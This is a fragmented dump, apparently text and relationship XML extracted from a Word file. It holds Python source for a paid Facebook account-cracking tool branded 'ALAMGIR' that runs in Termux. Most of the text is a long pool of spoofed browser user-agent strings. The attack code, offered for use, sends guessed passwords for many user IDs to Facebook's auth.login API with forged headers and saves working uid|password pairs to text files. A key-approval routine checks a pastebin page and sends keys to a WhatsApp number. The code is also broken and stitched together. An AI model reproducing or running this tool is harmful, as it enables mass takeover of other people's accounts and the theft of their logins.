AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121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Chrome/74.0.3729.157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6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",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6.0; Windows NT 5.1; SV1)",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Chrome/60.0.3112.113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WOW64; Trident/7.0;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Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134",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Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763",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(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN)",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5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",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6.0; Windows NT 5.1)",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WOW64; rv:54.0) Gecko/20100101 Firefox/54.0",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WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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7.0; Windows NT 6.0)",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10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121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WOW64; Trident/7.0;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WOW64; rv:18.0) Gecko/20100101 Firefox/18.0",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6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169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9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)",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6.0; Windows NT 5.1; .NET CLR 1.1.4322)",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Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362",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Trident/7.0;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6.0; Windows NT 5.0)",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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71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AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1",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Chrome/69.0.3497.100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Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",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Chrome/63.0.3239.132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9.0; Windows NT 6.1)",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Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363",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Chrome/80.0.3987.149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Chrome/79.0.3945.88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Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75",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Chrome/78.0.3904.108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5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90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Chrome/79.0.3945.130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Chrome/85.0.4183.121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Chrome/84.0.4147.105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6.0; Windows 98)",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Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113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6.3; WOW64; Trident/7.0;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Chrome/67.0.3396.99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5.1; rv:36.0) Gecko/20100101 Firefox/36.0",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5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)",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(compatible; Googlebot/2.1; +http://www.google.com/bot.html)",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(compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",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(compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",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(compatible; MJ12bot/v1.4.5;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http://www.majestic12.co.uk/bot.php?+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(compatible; Yahoo! Slurp;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http://help.yahoo.com/help/us/ysearch/slurp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6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",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"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)",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(Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)",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7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://aspiegel.com/petalbot)",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Chrome/49.0.2623.75 Safari/537.36 Google Favicon",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Chrome/44.0.2403.157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Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0",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U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0",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i686; rv:5.0) Gecko/20100101 Firefox/5.0",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AppleWebKit/534.24 (KHTML, like Gecko) Chrome/71.0.3578.141 Safari/534.24 XiaoMi/MiuiBrowser/12.4.3-g",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HeadlessChrome/69.0.3497.81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x86_64; rv:12.0) Gecko/20100101 Firefox/12.0",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Chrome/62.0.3202.89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U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1",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x86_64; rv:67.0) Gecko/20100101 Firefox/67.0",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i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/53.0.2785.143 Chrome/53.0.2785.143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Chrome/89.0.4389.72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Ubuntu; Linux i686; rv:46.0) Gecko/20100101 Firefox/46.0",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Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87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Chrome/65.0.3325.109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Chrome/59.0.3071.109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i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.120 Chrome/37.0.2062.120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Chrome/80.0.3987.116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Ubuntu; Linux i686; rv:53.0) Gecko/20100101 Firefox/53.0",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Ubuntu Chromium/76.0.3809.100 Chrome/76.0.3809.100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Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108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"Wget/1.17.1 (linux-gnu)",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Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0",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x86_64; rv:33.0) Gecko/20100101 Firefox/33.0",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Chrome/41.0.2272.101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x86_64; rv:41.0) Gecko/20100101 Firefox/41.0",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Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",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x86_64; rv:37.0) Gecko/20100101 Firefox/37.0",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HeadlessChrome/79.0.3945.0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Ubuntu; Linux i686; rv:59.0) Gecko/20100101 Firefox/59.0",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Chrome/62.0.3202.62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(SMART-TV; Linux; Tizen 5.0) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.2 Chrome/63.0.3239.84 TV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Ubuntu Chromium/70.0.3538.77 Chrome/70.0.3538.77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Chrome/51.0.2704.103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U; Linux i686; es-ES; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3",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i686) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22",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Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0",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Chrome/54.0.2840.59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x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",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HeadlessChrome/76.0.3809.87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HeadlessChrome/68.0.3419.0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Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0",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x86_64; rv:43.0) Gecko/20100101 Firefox/43.0",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Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116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Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1137.3",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Chrome/81.0.4044.122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Chrome/43.0.2357.134 Safari/537.36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http://notifyninja.com/monitoring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x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",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Chrome/56.0.2924.76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x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.8.0",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"WirtschaftsWoche-iOS-1.1.14-20200824.1315",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"[FBAN/FB4A;FBAV/222.0.0.48.113;FBBV/155323366;FBDM/{density=2.0,width=720,height=1360};FBLC/sr_RS;FBRV/156625696;FBCR/mt:s;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/LDN-L21;FBSV/8.0.0;FBOP/19;FBCA/armeabi-v7a:armeabi;]",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WOW64; rv:60.0) Gecko/20100101 Thunderbird/60.7.0 Lightning/6.2.7",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; BRI/2)",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7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)",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WOW64; Trident/7.0; MAARJS; rv:11.0) like Gecko",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8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16; MAAR)",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"Outlook-Express/7.0 (MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 1.0.0.40; BRI/2; MAAR; .NET CLR 1.1.4322; TmstmpExt)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; InfoPath.1; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0E)",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"DoCoMo/2.0 P903i(c100;TB;W24H12)",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"DoCoMo/2.0 P903i",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"DoCoMo/2.0 SH10C(c500;TB;W16H12)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MAFS; Microsoft Outlook 14.0.7162; ms-office; MSOffice 14)",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"HTC-3100/1.2 Mozilla/4.0 (compatible; MSIE 5.5; Windows CE; Smartphone; 240x320) UP.Link/6.3.0.0.0",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"HTC-3100/1.2 Mozilla/4.0 (compatible; MSIE 5.5; Windows CE; Smartphone; 240x320)",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"com.mobile.indiapp 2.0.5.5 phone HTC7088 android 16 fa zz normal long high 540 960",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"Mogujie4Android/NAMhuawei/1290",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10; AGR-AL09HN Build/HUAWEIAGR-AL09HN; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108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10; ANA-LX9 Build/HUAWEIANA-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile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Android; 2.3.8; sv-se; Nexus 1 Build/HUAWEI_X3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",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(Android; 4.0.4; Mobile; Huawei X3; rv:13.0) Gecko/13.0 Firefox/13.0",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(Android; Mobile Huawei X3; rv:13.0) Gecko/13.0 Firefox/13.0",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Android; 2.3.7; sv-se; Nexus 0 Build/HUAWEIX3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",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Android; 2.3.8; sv-se; Nexus 3 Build/HUAWEI_X3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",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2.3.8; sv-se; Huawei X3 Build/HuaweiSocialPhone) AppleWebKit/534.15 (KHTML, like Gecko) CrMo/32.0.1005.22 Mobile Safari/534.15",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8.1.0; LG-H932BK Build/OPM6.171019.030.K1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/69.0.3497.100 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/193.0.0.45.101;]",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"nokia-7.1-safari",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"NOKIA6120cUCBrowser/8.7.1.234/28/444/UCWEB",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4.1.2; en-au; GT-I8730T Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/61.0.0.15.69;]",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4.1.2; en-gb; GT-I8730T Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/79.0.0.18.71;]",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4.1.2; GT-I8730T Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 OPR/50.6.2426.201126",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4.4.2; GT-193011 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mobile UCBrowser/3.4.3.532",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4.0.4; de-de; SonyEricssonMT11i Build/Xperia Ultimate HD™ 3.0.2) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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(Android; Mobile; rv:30.0) Gecko/30.0 Firefox/30.0",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(Android; Tablet; rv:30.0) Gecko/30.0 Firefox/30.0",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6.2; rv:10.0) Gecko/20100101 Firefox/33.0",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6.2; Win64; x64; rv:10.0) Gecko/20100101 Firefox/33.0",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WOW64; rv:10.0) Gecko/20100101 Firefox/33.0",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10.6; rv:10.0) Gecko/20100101 Firefox/33.0",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PPC Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/33.0",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i686; rv:10.0) Gecko/20100101 Firefox/33.0",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x86_64; rv:10.0) Gecko/20100101 Firefox/33.0",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i686 on x86_64; rv:10.0) Gecko/20100101 Firefox/33.0",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(Maemo; Linux armv7l; rv:10.0) Gecko/20100101 Firefox/10.0 Fennec/10.0",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(Mobile; rv:26.0) Gecko/26.0 Firefox/26.0",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(Tablet; rv:26.0) Gecko/26.0 Firefox/26.0",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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198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Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 RuxitSynthetic/1.0 v9646582432 t38550 ath9b965f92 altpub cvcv=2",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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84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; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/",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4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile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5.1.1; Nexus 5 Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.65 Mobile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Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0",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x.y; rv:42.0) Gecko/20100101 Firefox/42.0",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Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Mobile Safari/537.36 Edge/15.15254",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Phone 10.0; Android 4.2.1; Microsoft; RM-1127_16056) AppleWebKit/537.36(KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.10536",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Phone 10.0; Android 4.2.1; Microsoft; Lumia 950) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.1058",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7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98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6.0.1; SGP771 Build/32.2.A.0.253; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98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6.0.1; SHIELD Tablet K1 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91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7.0; SM-T827R4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116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Android 5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102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Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",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(X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64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(Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",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6.0.1; Nexus Player Build/MMB29T)",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7.1.2; AFTMM Build/NS6264) CTV",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9; SM-N950U Build/PPR1.180610.011)",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"Dalvik/1.6.0 (Linux; U; Android 4.4.4; WT19M-FI Build/KTU84Q)",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9; SM-N960U Build/PPR1.180610.011)",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9; SM-G955U Build/PPR1.180610.011)",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10; SM-G965U Build/QP1A.190711.020)",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10; SM-G965U Build/QP1A.190711.020)",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10; SM-N960U Build/QP1A.190711.020)",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10; SM-G975U Build/QP1A.190711.020)",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7.1.2; AFTBAMR311 Build/NS6264) CTV",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9; SM-A102U Build/PPR1.180610.011)",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8.0.0; SM-G935V Build/R16NW)",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4.4.4; sk-sk; SAMSUNG SM-G357FZ/G357FZXXU1AQJ1 Build/KTU84P) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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4.4.2; pl-pl; SM-T310 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30",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4.2.2;pl-pl; Lenovo S5000-F/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2.2 Mobile Safari/534.30",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4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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"WeRead/5.2.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.3.4 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.2.4 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; VOG-L29 Build/HUAWEIVOG-L29)",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"WeRead/5.2.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.2.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; CDY-NX9A Build/HUAWEICDY-N29)",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"WeRead/5.1.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 7.0; BTV-W09 Build/HUAWEIBEETHOVEN-W09)",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"WeRead/5.1.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.0 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.0.3 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.0.5 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/4.2.3 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0.1; HUAWEI RIO-AL00 Build/HuaweiRIO-AL00)",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"WeRead/4.1.5 WRBrand/Huawei Dalvik/2.1.0 (Linux; U; Android 7.0; EVA-L09 Build/HUAWEIEVA-L09)",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"WeRead/3.5.0 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0; DIG-AL00 Build/HUAWEIDIG-AL00)",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"WeRead/4.1.1 WRBrand/Huawei Dalvik/2.1.0 (Linux; U; Android 7.0; EVA-L09 Build/HUAWEIEVA-L09)",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"WeRead/4.1.1 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0.1; HUAWEI RIO-AL00 Build/HuaweiRIO-AL00)",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5.1)",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"Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-P7510 Build/IMM76D)"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5.1; AFTM Build/LMY47O)",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6.0.1; SM-J700F Build/MMB29K) [FBAN/Orca-Android;FBAV/181.0.0.12.78;FBPN/com.facebook.orca;FBLC/tr_TR;FBBV/122216364;FBCR/Turk Telekom;FBMF/samsung;FBBD/samsung;FBDV/SM-J700F;FBSV/6.0.1;FBCA/armeabi-v7a:armeabi;FBDM{density=3.0,width=720,height=1440}",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"Dalvik/1.6.0 (Linux; U; Android 4.4.2; ASUS_T00Q Build/KVT49L)UNTRUSTED/1.0C-1.1; Opera Mini/att/4.2",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"Dalvik/1.4.0 (Linux; U; Android 2.3.6; HUAWEI Y210-0100 Build/HuaweiY210-0100)",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"Dalvik/1.4.0 (Linux; U; Android 2.3.6; GT-S5570 Build/GINGERBREAD)",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(Linux; U; Android 4.2.2; en-us; Galaxy Nexus Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.3",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"Dalvik/1.6.0 (Linux; U; Android 4.2.2; Galaxy Nexus Build/JDQ39)",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(iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Mobile/14G60",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"Dalvik/2.1.0 (Linux; U; Android 5.1; PRO 5 Build/LMY47D)",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Win32; WinHttp.WinHttpRequest.5)",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x64; rv:58.0) Gecko/20100101 Firefox/58.0",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Chrome/71.0.3578.98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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115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"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)",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Chrome/89.0.4389.114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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106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x64; rv:85.0) Gecko/20100101 Firefox/85.0",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6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132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IoT 10.0; Android 6.0.1; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134",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x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36",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"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",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"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"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sys.stdout.write(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"\r [ALAMGIR ] %s/%s -&gt; Ok:-%s - Cp:-%s "%(self.loop, len(self.id), len(self.cp), len(self.ok))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); sys.stdout.flush()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pw in pwx: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pw = pw.lower()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ses = requests.Session()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headers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"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)),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"x-fb-sim-hni": str(random.randint(20000, 40000)),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"x-fb-net-hni": str(random.randint(20000, 40000)),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"x-fb-connection-quality": "EXCELLENT",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"x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",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"user-agent": rua,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"content-type": "application/x-www-form-urlencoded",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"x-fb-http-engine": "Liger"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response = ses.get("https://b-api.facebook.com/method/auth.login?format=json&amp;email="+str(uid)+"&amp;password="+str(pw)+"&amp;credentials_type=device_based_login_password&amp;generate_session_cookies=1&amp;error_detail_type=button_with_disabled&amp;source=device_based_login&amp;meta_inf_fbmeta=%20&amp;currently_logged_in_userid=0&amp;method=GET&amp;locale=en_US&amp;client_country_code=US&amp;fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&amp;access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&amp;fb_api_req_friendly_name=authenticate&amp;cpl=true", headers=headers)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"session_key" in response.text and "EAAA" in response.text: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print("\r \033[0;92m[ ALAMGIR-OK ] %s | %s\033[0;97m         "%(uid, pw))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 ("\r \033[0;92m Congrats Bro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self.ok.append("%s|%s"%(uid, pw))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open("2009-ALAMGIR-Ok.txt","a").write(" %s|%s\n"%(uid, pw))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elif "</w:t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www.facebook.com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in response.json()["error_msg"]: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print("\r \033[0;92m[ ALAMGIR-OK ] %s | %s\033[0;97m         "%(uid, pw))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self.cp.append("%s|%s"%(uid, pw))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open("2009-ALAMGIR-OK.txt","a").write(" %s | %s\n"%(uid, pw))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continue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self.loop +=1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Subscraption():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key1=open('/data/data/com.termux/files/usr/bin/.mrahsan-cov', 'r').read()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clear()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print(logo)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r1=requests.get("https://pastebin.com/p3jbWM14").text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key1 in r1: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os.system('clear')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print(logo)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os.system("clear")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print(logo)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print("\t \033[1;32m First Get Approvel\033[1;37m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time.sleep(1)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os.system("clear")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print(logo)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("")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 \033[1;32m ALAMGIR Toll Paid You Need Get Approved First\033[1;37m\n")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 \033[1;32m Note : Paid Tolls Free  HA JANI LOG \033[1;37m")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("")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 Your Key is Not Approved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print(" Copy And Send Key To Admin")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("")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(" Your Key : "+alamgir+priya+key1)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("")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name = input(" Your Name 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("")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input(" Press Enter To Send Key")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time.sleep(3.5)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tks = 'Dear%20Admin,%20Please%20Approved%20My%20Key%20To%20Premium%20%20Thanks%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20My%20Name%20:%20'+name+'%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20My%20%20Key%20%20:%20'+alamgir+priya+''+key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os.system('am start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https://wa.me/+8801712034653?text='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tks)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Subscraption()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help.yahoo.com/help/us/ysearch/slurp" Id="docRId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://m.me/Tera.Papa.Alamgir.441/?app=fbl" Id="docRId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://notifyninja.com/monitoring" Id="docRId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://m.me/Tera.Papa.Alamgir.441/?app=fbl" Id="docRId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://business.facebook.com/" Id="docRId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.facebook.com/Tera.Papa.Alamgir.441" Id="docRId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.facebook.com/" Id="docRId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.facebook.com/" Id="docRId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /><Relationship TargetMode="External" Target="https://www.facebook.com/Tera.Papa.Alamgir.441" Id="docRId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.gitclone//github.com/cyberattack07" Id="docRId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.facebook.com/" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.majestic12.co.uk/bot.php?+" Id="docRId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.majestic12.co.uk/bot.php?+" Id="docRId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="numbering.xml" Id="docRId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" /><Relationship TargetMode="External" Target="https://github.com/cyberattack07/approval.txt/blob/main/approval.txt" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://m.me/Tera.Papa.Alamgir.441/?app=fbl" Id="docRId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://help.yahoo.com/help/us/ysearch/slurp" Id="docRId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://wa.me/+8801712034653?text='" Id="docRId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.facebook.com/Tera.Papa.Alamgir.441" Id="docRId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.facebook.com/Tera.Papa.Alamgir.441/x1b%5B0m/x1b%5B1;97m" Id="docRId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://notifyninja.com/monitoring" Id="docRId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="http://www.gitclone//github.com/cyberattack07" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /></Relationships>
</file>